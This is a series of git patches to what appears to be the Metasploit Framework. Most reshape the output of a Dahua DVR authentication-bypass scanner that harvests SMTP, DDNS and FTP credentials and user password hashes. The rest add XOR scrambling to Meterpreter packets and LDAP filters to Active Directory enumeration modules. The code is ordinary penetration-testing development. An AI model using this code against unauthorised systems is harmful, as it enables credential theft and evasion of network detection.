mailserver.blank? && mailport.blank? && muser.blank? && mpass.blank? + email_table.print report_email_creds(mailserver, mailport, muser, mpass) end From 75e31c252e08938485dfc1b7f5b5211b22cf540d Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Mon, 7 Dec 2015 14:48:28 -0500 Subject: [PATCH 042/686] added rex table for nas settings, still working on users and hashes rex table --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index bbd508e062..13363aa68f 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -142,8 +142,8 @@ class Metasploit3 < Msf::Auxiliary ddns_user = "#{val[4]}" ddns_pass = "#{val[5]}" ddns_table << ["#{ddns_service}", "#{ddns_server}", "#{ddns_port}", "#{ddns_domain}", "#{ddns_user}", "#{ddns_pass}"] - ddns_table.print unless ddns_server.blank? && ddns_port.blank? && ddns_user.blank? && ddns_pass.blank? + ddns_table.print report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) end end @@ -156,18 +156,21 @@ class Metasploit3 < Msf::Auxiliary print_status("Nas Settings @ #{rhost}:#{rport}!:") server = '' port = '' + nas_table = Rex::Ui::Text::Table.new( + 'Header' => 'Dahaua NAS Settings', + 'Indent' => '1', + 'Columns' => ['Nas Server', 'Nas Port', 'FTP User', 'FTP Pass'] + ) if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/ server = Regexp.last_match[1].unpack('C*').join('.') port = Regexp.last_match[2].unpack('S') - print_status(" Nas Server #{server}") - print_status(" Nas Port: #{port}") end if /[\x00]{16,}(?[[:print:]]+)[\x00]{16,}(?[[:print:]]+)/ =~ data ftpuser.strip! ftppass.strip! unless ftpuser.blank? || ftppass.blank? - print_good(" FTP User: #{ftpuser}") - print_good(" FTP Password: #{ftppass}") + nas_table << ["#{server}", "#{port}", "#{ftpuser}", "#{ftppass}"] + nas_table.print report_creds( host: server, port: port, @@ -195,10 +198,16 @@ class Metasploit3 < Msf::Auxiliary return unless (response = sock.get_once) data = response.split('&&') usercount = 0 + users_table = Rex::Ui::Text::Table.new( + 'Header' => 'Dahua Users Hashes and groups', + 'Indent' => '1', + 'Columns' => ['Username', 'Password Hash', 'Permissions', 'Description'] + ) print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") data.each do |val| usercount += 1 pass = "#{val[/(([\d]+)[:]([0-9A-Z]+)[:]([0-9A-Z]+))/i]}" + # print_status("Perms: #{val[/(([0-9][0-9]*, )*[0-9][0-9]*)/]}") value = pass.split(":") user = "#{value[1]}" md5hash = "#{value[2]}" From c747ffc05adda299fdf000be25a20bd71c72e043 Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 8 Dec 2015 16:36:26 +1000 Subject: [PATCH 043/686] Implement support for TLV packet XORing, and RECV removal --- lib/rex/post/meterpreter/packet.rb | 38 +++++++++++++++++++ lib/rex/post/meterpreter/packet_dispatcher.rb | 4 +- lib/rex/post/meterpreter/packet_parser.rb | 20 +++++++--- .../post/meterpreter/packet_parser_spec.rb | 2 +- 4 files changed, 55 insertions(+), 9 deletions(-) diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index 459fb2d4bb..423f8880d2 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb @@ -665,6 +665,44 @@ class Packet < GroupTlv end end + # + # Override the function that creates the raw byte stream for + # sending so that it generates an XOR key, uses it to scramble + # the serialized TLV content, and then returns the key plus the + # scrambled data as the payload. + # + def to_r + raw = super + xor_key = rand(254) + 1 + xor_key |= (rand(254) + 1) << 8 + xor_key |= (rand(255) + 1) << 16 + xor_key |= (rand(255) + 1) << 24 + result = [xor_key].pack('N') + xor_bytes(xor_key, raw) + result + end + + # + # Override the function that reads from a raw byte stream so + # that the XORing of data is included in the process prior to + # passing it on to the default functionality that can parse + # the TLV values. + # + def from_r(bytes) + xor_key = bytes[0,4].unpack('N')[0] + super(xor_bytes(xor_key, bytes[4, bytes.length])) + end + + # + # Xora set of bytes with a given DWORD xor key. + # + def xor_bytes(xor_key, bytes) + result = '' + bytes.bytes.zip([xor_key].pack('V').bytes.cycle).each do |b| + result << (b[0].ord ^ b[1].ord).chr + end + result + end + ## # # Conditionals diff --git a/lib/rex/post/meterpreter/packet_dispatcher.rb b/lib/rex/post/meterpreter/packet_dispatcher.rb index cfcd7576fc..bf1a00e80d 100644 --- a/lib/rex/post/meterpreter/packet_dispatcher.rb +++ b/lib/rex/post/meterpreter/packet_dispatcher.rb @@ -108,8 +108,7 @@ module PacketDispatcher self.last_checkin = Time.now - # If the first 4 bytes are "RECV", return the oldest packet from the outbound queue - if req.body[0,4] == "RECV" + if req.method == 'GET' rpkt = send_queue.shift resp.body = rpkt || '' begin @@ -170,6 +169,7 @@ module PacketDispatcher end end + if bytes.to_i == 0 # Mark the session itself as dead self.alive = false diff --git a/lib/rex/post/meterpreter/packet_parser.rb b/lib/rex/post/meterpreter/packet_parser.rb index 8aebe3de39..c4c93d6b37 100644 --- a/lib/rex/post/meterpreter/packet_parser.rb +++ b/lib/rex/post/meterpreter/packet_parser.rb @@ -12,6 +12,11 @@ module Meterpreter ### class PacketParser + # 4 byte xor + # 4 byte length + # 4 byte type + HEADER_SIZE = 12 + # # Initializes the packet parser context with an optional cipher. # @@ -26,7 +31,7 @@ class PacketParser # def reset self.raw = '' - self.hdr_length_left = 8 + self.hdr_length_left = HEADER_SIZE self.payload_length_left = 0 end @@ -34,6 +39,9 @@ class PacketParser # Reads data from the wire and parse as much of the packet as possible. # def recv(sock) + # Create a typeless packet + packet = Packet.new(0) + if (self.hdr_length_left > 0) buf = sock.read(self.hdr_length_left) @@ -49,7 +57,10 @@ class PacketParser # payload length left to the number of bytes # specified in the length if (self.hdr_length_left == 0) - self.payload_length_left = raw.unpack("N")[0] - 8 + xor_key = raw[0, 4].unpack('N')[0] + length_bytes = packet.xor_bytes(xor_key, raw[4, 4]) + # header size doesn't include the xor key, which is always tacked on the front + self.payload_length_left = length_bytes.unpack("N")[0] - (HEADER_SIZE - 4) end elsif (self.payload_length_left > 0) buf = sock.read(self.payload_length_left) @@ -67,14 +78,11 @@ class PacketParser if ((self.hdr_length_left == 0) && (self.payload_length_left == 0)) - # Create a typeless packet - packet = Packet.new(0) - # TODO: cipher decryption if (cipher) end - # Serialize the packet from the raw buffer + # Deserialize the packet from the raw buffer packet.from_r(self.raw) # Reset our state diff --git a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb index 9ffa2f1a46..af39577024 100644 --- a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb +++ b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb @@ -20,7 +20,7 @@ describe Rex::Post::Meterpreter::PacketParser do it "should initialise with expected defaults" do parser.send(:raw).should == "" - parser.send(:hdr_length_left).should == 8 + parser.send(:hdr_length_left).should == 12 parser.send(:payload_length_left).should == 0 end From ed49a67c8b4c0fe739e7226debc47bcacce4b966 Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 8 Dec 2015 16:59:57 +1000 Subject: [PATCH 044/686] Add .php and .py meterpreter excludes to gitignore --- .gitignore | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.gitignore b/.gitignore index 532dcce24a..e83ddb0b91 100644 --- a/.gitignore +++ b/.gitignore @@ -68,6 +68,8 @@ external/source/exploits/**/Release # Avoid checking in Meterpreter binaries. These are supplied upstream by # the metasploit-payloads gem. data/meterpreter/*.dll +data/meterpreter/*.php +data/meterpreter/*.py data/meterpreter/*.bin data/meterpreter/*.jar data/meterpreter/*.lso From 92d56cd050a752b2185241d8854073e725c5cc17 Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Tue, 8 Dec 2015 16:24:47 -0500 Subject: [PATCH 045/686] cleaned up uncessary Rex Tables working on the rest of them for users, groups and channels --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 26 ++++++++----------- 1 file changed, 11 insertions(+), 15 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 13363aa68f..a7064f6fd5 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -103,22 +103,21 @@ class Metasploit3 < Msf::Auxiliary sock.put(EMAIL) return unless (response = sock.get_once) data = response.split('&&') + print_good("#{peer} -- Email Settings:") return unless data.first =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?(?:\.[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?)*\.?+:\d+)/i - email_table = Rex::Ui::Text::Table.new( - 'Header' => 'Dahua Email Settings', - 'Indent' => '1', - 'Columns' => ['Email Server', 'Email Port', 'Email User', 'Email Password'] - ) if mailhost = Regexp.last_match[1].split(':') + print_status(" Server: #{mailhost[0]}") unless mailhost[0].blank? + print_status(" Server Port: #{mailhost[1]}") unless mailhost[1].blank? + print_status(" Destination Email: #{data[1]}") unless data[1].blank? mailserver = "#{mailhost[0]}" mailport = "#{mailhost[1]}" end return unless data[5].blank? && data[6].blank? + print_good(" SMTP User: #{data[5]}") + print_good(" SMTP Password: #{data[6]}") muser = "#{data[5]}" mpass = "#{data[6]}" - email_table << ["#{mailserver}", "#{mailport}", "#{muser}", "#{mpass}"] return unless mailserver.blank? && mailport.blank? && muser.blank? && mpass.blank? - email_table.print report_email_creds(mailserver, mailport, muser, mpass) end @@ -153,14 +152,9 @@ class Metasploit3 < Msf::Auxiliary connect sock.put(NAS) return unless (data = sock.get_once) - print_status("Nas Settings @ #{rhost}:#{rport}!:") + print_good("#{peer} -- NAS Settings:") server = '' port = '' - nas_table = Rex::Ui::Text::Table.new( - 'Header' => 'Dahaua NAS Settings', - 'Indent' => '1', - 'Columns' => ['Nas Server', 'Nas Port', 'FTP User', 'FTP Pass'] - ) if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/ server = Regexp.last_match[1].unpack('C*').join('.') port = Regexp.last_match[2].unpack('S') @@ -169,8 +163,10 @@ class Metasploit3 < Msf::Auxiliary ftpuser.strip! ftppass.strip! unless ftpuser.blank? || ftppass.blank? - nas_table << ["#{server}", "#{port}", "#{ftpuser}", "#{ftppass}"] - nas_table.print + print_good(" Nas Server: #{server}") + print_good(" Nas Port: #{port}") + print_good(" FTP User: #{ftpuser}") + print_good(" FTP Pass: #{ftppass}") report_creds( host: server, port: port, From 48cd350711fbcfafbe78db07f907cefa5c55f66b Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Tue, 8 Dec 2015 16:29:00 -0500 Subject: [PATCH 046/686] updated authors list with contributors --- modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index a7064f6fd5..bf7f61b87e 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -9,7 +9,8 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q(Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user's password and clears the device logs), 'Author' => [ 'Jake Reynolds - Depth Security', # Vulnerability Discoverer - 'Tyler Bennett - Talos Infosec' # Metasploit Module + 'Tyler Bennett - Talos Infosec', # Metasploit Module + 'Jon Hart ' # improved metasploit module ], 'References' => [ [ 'CVE', '2013-6117' ], From e574c844de5129ecb7d44d4d8315562470f65fea Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Tue, 8 Dec 2015 18:19:30 -0500 Subject: [PATCH 047/686] added rex table for channels func, has an issues with TypeError no implicit conversion of String into Integer upon building the table --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 20 ++++++++++++++++++- 1 file changed, 19 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index bf7f61b87e..00560611b9 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -184,9 +184,27 @@ class Metasploit3 < Msf::Auxiliary sock.put(CHANNELS) data = sock.get_once.split('&&') disconnect + channels_table = Rex::Ui::Text::Table.new( + 'Header' => 'Dahua Camera Channels', + 'Indent' => '1', + 'Columns' => ['Number', 'Channels'] + ) return unless data.length > 1 print_good("#{peer} -- camera channels:") - data.each_with_index { |val, index| print_status(" #{index + 1}:#{val[/([[:print:]]+)/]}") } + data.each_with_index do |val, index| + # puts val, index + 1 + # next if index > 1 + number = "#{index}" + channels = "#{val[/([[:print:]]+)/]}" + # number = "#{val[0]}" + # channels = "#{val[1]}" + print_status(" #{number}") + print_status(" #{channels}") + channels_table << ["#{number}".to_i, "#{channels}".to_i] + channels_table.print + # print_status(" #{val[/([[:print:]]+)/]}") + # print_status(" #{index + 1}:#{val[/([[:print:]]+)/]}") + end end def grab_users From c2ef7be217620dfa1b24889b7a35ea944b555b74 Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Wed, 9 Dec 2015 17:49:38 -0500 Subject: [PATCH 048/686] cleaned up regex isseus and added the appropriate rex tables. Having issues with printing them due to type errors, but Im working on it --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 41 ++++++++++--------- 1 file changed, 21 insertions(+), 20 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 00560611b9..92783e3c1d 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -10,7 +10,8 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'Jake Reynolds - Depth Security', # Vulnerability Discoverer 'Tyler Bennett - Talos Infosec', # Metasploit Module - 'Jon Hart ' # improved metasploit module + 'Jon Hart ', # improved metasploit module + 'Nathan McBride' # regex extraordinaire ], 'References' => [ [ 'CVE', '2013-6117' ], @@ -192,18 +193,10 @@ class Metasploit3 < Msf::Auxiliary return unless data.length > 1 print_good("#{peer} -- camera channels:") data.each_with_index do |val, index| - # puts val, index + 1 - # next if index > 1 - number = "#{index}" - channels = "#{val[/([[:print:]]+)/]}" - # number = "#{val[0]}" - # channels = "#{val[1]}" - print_status(" #{number}") - print_status(" #{channels}") - channels_table << ["#{number}".to_i, "#{channels}".to_i] + number = index.to_s + channels = val[/([[:print:]]+)/].to_s + channels_table << [ number, channels ] channels_table.print - # print_status(" #{val[/([[:print:]]+)/]}") - # print_status(" #{index + 1}:#{val[/([[:print:]]+)/]}") end end @@ -214,19 +207,17 @@ class Metasploit3 < Msf::Auxiliary data = response.split('&&') usercount = 0 users_table = Rex::Ui::Text::Table.new( - 'Header' => 'Dahua Users Hashes and groups', + 'Header' => 'Dahua Users Hashes and Rights', 'Indent' => '1', 'Columns' => ['Username', 'Password Hash', 'Permissions', 'Description'] ) print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") data.each do |val| usercount += 1 - pass = "#{val[/(([\d]+)[:]([0-9A-Z]+)[:]([0-9A-Z]+))/i]}" - # print_status("Perms: #{val[/(([0-9][0-9]*, )*[0-9][0-9]*)/]}") - value = pass.split(":") - user = "#{value[1]}" - md5hash = "#{value[2]}" - print_status(" #{val[/(([\d]+)[:]([[:print:]]+))/]}") + user, md5hash, rights, name = val.match(/^.*:(.*):(.*):.*:(.*):(.*):.*$/).captures + users_table << [user, md5hash, rights, name] + users_table.print + # print_status(" #{val[/(([\d]+)[:]([[:print:]]+))/]}") # Write the dahua hash to the database hash = "#{rhost} #{user}:$dahua$#{md5hash}" report_hash(rhost, rport, user, hash) @@ -248,8 +239,18 @@ class Metasploit3 < Msf::Auxiliary sock.put(GROUPS) return unless (response = sock.get_once) data = response.split('&&') + groups_table = Rex::Ui::Text::Table.new( + 'Header' => 'Dahua groups', + 'Indent' => '1', + 'Columns' => ['Number', 'Group'] + ) print_good("#{peer} -- groups:") - data.each { |val| print_status(" #{val[/(([\d]+)[:]([\w]+))/]}") } + data.each { |val| + number = val[/(([\d]+))/].to_i + groups = val[/(([a-z]+))/].to_i + groups_table << [ number, groups ] + groups_table.print + } end def reset_user From c000e590d4eb0f447687c0a5f945f90a83691c4a Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Thu, 10 Dec 2015 15:51:59 -0500 Subject: [PATCH 049/686] verified table values are correctly typed as Strs, but it still fails to print the tables --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 24 ++++++++++++------- 1 file changed, 15 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 92783e3c1d..9407ae0473 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -194,10 +194,10 @@ class Metasploit3 < Msf::Auxiliary print_good("#{peer} -- camera channels:") data.each_with_index do |val, index| number = index.to_s - channels = val[/([[:print:]]+)/].to_s - channels_table << [ number, channels ] - channels_table.print + channels = val[/([[:print:]]+)/] + channels_table << [ "#{number}", "#{channels}" ] end + channels_table.print end def grab_users @@ -216,8 +216,12 @@ class Metasploit3 < Msf::Auxiliary usercount += 1 user, md5hash, rights, name = val.match(/^.*:(.*):(.*):.*:(.*):(.*):.*$/).captures users_table << [user, md5hash, rights, name] - users_table.print - # print_status(" #{val[/(([\d]+)[:]([[:print:]]+))/]}") + # puts user.class + # puts md5hash.class + # puts rights.class + # puts name.class + # users_table.print + print_status(" #{val[/(([\d]+)[:]([[:print:]]+))/]}") # Write the dahua hash to the database hash = "#{rhost} #{user}:$dahua$#{md5hash}" report_hash(rhost, rport, user, hash) @@ -245,12 +249,14 @@ class Metasploit3 < Msf::Auxiliary 'Columns' => ['Number', 'Group'] ) print_good("#{peer} -- groups:") - data.each { |val| - number = val[/(([\d]+))/].to_i - groups = val[/(([a-z]+))/].to_i + data.each do |val| + number = "#{val[/(([\d]+))/]}" + groups = "#{val[/(([a-z]+))/]}" + # puts number.class + # puts groups.class groups_table << [ number, groups ] groups_table.print - } + end end def reset_user From bda6c940cf15ee6187eaa463be8c60d6c71c2981 Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Mon, 14 Dec 2015 16:23:18 -0500 Subject: [PATCH 050/686] fixed issues with printing of tables and cleaned up output a bit removed unecessary prints --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 22 ++++++------------- 1 file changed, 7 insertions(+), 15 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 9407ae0473..b1626d8aff 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -187,8 +187,8 @@ class Metasploit3 < Msf::Auxiliary disconnect channels_table = Rex::Ui::Text::Table.new( 'Header' => 'Dahua Camera Channels', - 'Indent' => '1', - 'Columns' => ['Number', 'Channels'] + 'Indent' => 1, + 'Columns' => ['ID', 'Channels'] ) return unless data.length > 1 print_good("#{peer} -- camera channels:") @@ -208,20 +208,13 @@ class Metasploit3 < Msf::Auxiliary usercount = 0 users_table = Rex::Ui::Text::Table.new( 'Header' => 'Dahua Users Hashes and Rights', - 'Indent' => '1', + 'Indent' => 1, 'Columns' => ['Username', 'Password Hash', 'Permissions', 'Description'] ) - print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") data.each do |val| usercount += 1 user, md5hash, rights, name = val.match(/^.*:(.*):(.*):.*:(.*):(.*):.*$/).captures users_table << [user, md5hash, rights, name] - # puts user.class - # puts md5hash.class - # puts rights.class - # puts name.class - # users_table.print - print_status(" #{val[/(([\d]+)[:]([[:print:]]+))/]}") # Write the dahua hash to the database hash = "#{rhost} #{user}:$dahua$#{md5hash}" report_hash(rhost, rport, user, hash) @@ -236,6 +229,7 @@ class Metasploit3 < Msf::Auxiliary refs: references ) end + users_table.print end def grab_groups @@ -245,18 +239,16 @@ class Metasploit3 < Msf::Auxiliary data = response.split('&&') groups_table = Rex::Ui::Text::Table.new( 'Header' => 'Dahua groups', - 'Indent' => '1', - 'Columns' => ['Number', 'Group'] + 'Indent' => 1, + 'Columns' => ['ID', 'Group'] ) print_good("#{peer} -- groups:") data.each do |val| number = "#{val[/(([\d]+))/]}" groups = "#{val[/(([a-z]+))/]}" - # puts number.class - # puts groups.class groups_table << [ number, groups ] - groups_table.print end + groups_table.print end def reset_user From 797bd9e04d694b03ef55a402f5844e7728b2ca7c Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Tue, 15 Dec 2015 16:31:25 -0500 Subject: [PATCH 051/686] added peer to each table and added each users groups to the users table --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 43 +++++++++---------- 1 file changed, 20 insertions(+), 23 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index b1626d8aff..a044e6c11c 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -113,12 +113,12 @@ class Metasploit3 < Msf::Auxiliary print_status(" Destination Email: #{data[1]}") unless data[1].blank? mailserver = "#{mailhost[0]}" mailport = "#{mailhost[1]}" + muser = "#{data[5]}" + mpass = "#{data[6]}" end - return unless data[5].blank? && data[6].blank? + return if muser.blank? && mpass.blank? print_good(" SMTP User: #{data[5]}") print_good(" SMTP Password: #{data[6]}") - muser = "#{data[5]}" - mpass = "#{data[6]}" return unless mailserver.blank? && mailport.blank? && muser.blank? && mpass.blank? report_email_creds(mailserver, mailport, muser, mpass) end @@ -136,13 +136,13 @@ class Metasploit3 < Msf::Auxiliary data.each_with_index do |val, index| next if index == 0 val = val.split("&&") - ddns_service = "#{val[0]}" - ddns_server = "#{val[1]}" - ddns_port = "#{val[2]}" - ddns_domain = "#{val[3]}" - ddns_user = "#{val[4]}" - ddns_pass = "#{val[5]}" - ddns_table << ["#{ddns_service}", "#{ddns_server}", "#{ddns_port}", "#{ddns_domain}", "#{ddns_user}", "#{ddns_pass}"] + ddns_service = val[0] + ddns_server = val[1] + ddns_port = val[2] + ddns_domain = val[3] + ddns_user = val[4] + ddns_pass = val[5] + ddns_table << [ ddns_service, ddns_server, ddns_port, ddns_domain, ddns_user, ddns_pass ] unless ddns_server.blank? && ddns_port.blank? && ddns_user.blank? && ddns_pass.blank? ddns_table.print report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) @@ -165,8 +165,8 @@ class Metasploit3 < Msf::Auxiliary ftpuser.strip! ftppass.strip! unless ftpuser.blank? || ftppass.blank? - print_good(" Nas Server: #{server}") - print_good(" Nas Port: #{port}") + print_good(" NAS Server: #{server}") + print_good(" NAS Port: #{port}") print_good(" FTP User: #{ftpuser}") print_good(" FTP Pass: #{ftppass}") report_creds( @@ -175,7 +175,7 @@ class Metasploit3 < Msf::Auxiliary user: ftpuser, pass: ftppass, type: "FTP", - active: true) if !server.nil? && !port.nil? && !ftpuser.nil? && !ftppass.nil? + active: true) end end end @@ -184,18 +184,16 @@ class Metasploit3 < Msf::Auxiliary connect sock.put(CHANNELS) data = sock.get_once.split('&&') - disconnect channels_table = Rex::Ui::Text::Table.new( 'Header' => 'Dahua Camera Channels', 'Indent' => 1, - 'Columns' => ['ID', 'Channels'] + 'Columns' => ['ID', 'Peer', 'Channels'] ) return unless data.length > 1 - print_good("#{peer} -- camera channels:") data.each_with_index do |val, index| number = index.to_s channels = val[/([[:print:]]+)/] - channels_table << [ "#{number}", "#{channels}" ] + channels_table << [ number, peer, channels ] end channels_table.print end @@ -209,12 +207,12 @@ class Metasploit3 < Msf::Auxiliary users_table = Rex::Ui::Text::Table.new( 'Header' => 'Dahua Users Hashes and Rights', 'Indent' => 1, - 'Columns' => ['Username', 'Password Hash', 'Permissions', 'Description'] + 'Columns' => ['Username', 'Password Hash', 'Groups', 'Permissions', 'Description'] ) data.each do |val| usercount += 1 - user, md5hash, rights, name = val.match(/^.*:(.*):(.*):.*:(.*):(.*):.*$/).captures - users_table << [user, md5hash, rights, name] + user, md5hash, groups, rights, name = val.match(/^.*:(.*):(.*):(.*):(.*):(.*):(.*)$/).captures + users_table << [user, md5hash, groups, rights, name] # Write the dahua hash to the database hash = "#{rhost} #{user}:$dahua$#{md5hash}" report_hash(rhost, rport, user, hash) @@ -240,13 +238,12 @@ class Metasploit3 < Msf::Auxiliary groups_table = Rex::Ui::Text::Table.new( 'Header' => 'Dahua groups', 'Indent' => 1, - 'Columns' => ['ID', 'Group'] + 'Columns' => ['ID', 'Peer', 'Group'] ) - print_good("#{peer} -- groups:") data.each do |val| number = "#{val[/(([\d]+))/]}" groups = "#{val[/(([a-z]+))/]}" - groups_table << [ number, groups ] + groups_table << [ number, peer, groups ] end groups_table.print end From 5bb8dbcafc6819ef67584446c9d737bf37999ce9 Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Tue, 15 Dec 2015 16:45:45 -0500 Subject: [PATCH 052/686] added peer to users table --- modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index a044e6c11c..cb4ab07090 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -207,12 +207,12 @@ class Metasploit3 < Msf::Auxiliary users_table = Rex::Ui::Text::Table.new( 'Header' => 'Dahua Users Hashes and Rights', 'Indent' => 1, - 'Columns' => ['Username', 'Password Hash', 'Groups', 'Permissions', 'Description'] + 'Columns' => ['Peer', 'Username', 'Password Hash', 'Groups', 'Permissions', 'Description'] ) data.each do |val| usercount += 1 user, md5hash, groups, rights, name = val.match(/^.*:(.*):(.*):(.*):(.*):(.*):(.*)$/).captures - users_table << [user, md5hash, groups, rights, name] + users_table << [ peer, user, md5hash, groups, rights, name] # Write the dahua hash to the database hash = "#{rhost} #{user}:$dahua$#{md5hash}" report_hash(rhost, rport, user, hash) From c9c1dd22eeb63459aead897dbe6310325405d801 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Wed, 16 Dec 2015 10:38:38 +0000 Subject: [PATCH 053/686] Added custom LDAP filter to ad_groups and ad_users to save having to use meterpreter's adsi interface --- modules/post/windows/gather/enum_ad_groups.rb | 5 ++++- modules/post/windows/gather/enum_ad_users.rb | 2 ++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/enum_ad_groups.rb b/modules/post/windows/gather/enum_ad_groups.rb index ade732c27a..f39cdca71b 100644 --- a/modules/post/windows/gather/enum_ad_groups.rb +++ b/modules/post/windows/gather/enum_ad_groups.rb @@ -32,6 +32,7 @@ class Metasploit3 < Msf::Post register_options([ OptString.new('ADDITIONAL_FIELDS', [false, 'Additional fields to retrieve, comma separated', nil]), + OptString.new('FILTER', [false, 'Customised LDAP filter', nil]), ], self.class) end @@ -46,7 +47,9 @@ class Metasploit3 < Msf::Post max_search = datastore['MAX_SEARCH'] begin - q = query('(objectClass=group)', max_search, @user_fields) + f = "" + f = "(#{datastore['FILTER']})" if datastore['FILTER'] + q = query("(&(objectClass=group)#{f})", max_search, @user_fields) rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e # Can't bind or in a network w/ limited accounts print_error(e.message) diff --git a/modules/post/windows/gather/enum_ad_users.rb b/modules/post/windows/gather/enum_ad_users.rb index 2fc5ed7779..48b8e86e62 100644 --- a/modules/post/windows/gather/enum_ad_users.rb +++ b/modules/post/windows/gather/enum_ad_users.rb @@ -47,6 +47,7 @@ class Metasploit3 < Msf::Post OptBool.new('EXCLUDE_LOCKED', [true, 'Exclude in search locked accounts..', false]), OptBool.new('EXCLUDE_DISABLED', [true, 'Exclude from search disabled accounts.', false]), OptString.new('ADDITIONAL_FIELDS', [false, 'Additional fields to retrieve, comma separated', nil]), + OptString.new('FILTER', [false, 'Customised LDAP filter', nil]), OptString.new('GROUP_MEMBER', [false, 'Recursively list users that are effectve members of the group DN specified.', nil]), OptEnum.new('UAC', [true, 'Filter on User Account Control Setting.', 'ANY', [ @@ -146,6 +147,7 @@ class Metasploit3 < Msf::Post inner_filter << '(!(lockoutTime>=1))' if datastore['EXCLUDE_LOCKED'] inner_filter << '(!(userAccountControl:1.2.840.113556.1.4.803:=2))' if datastore['EXCLUDE_DISABLED'] inner_filter << 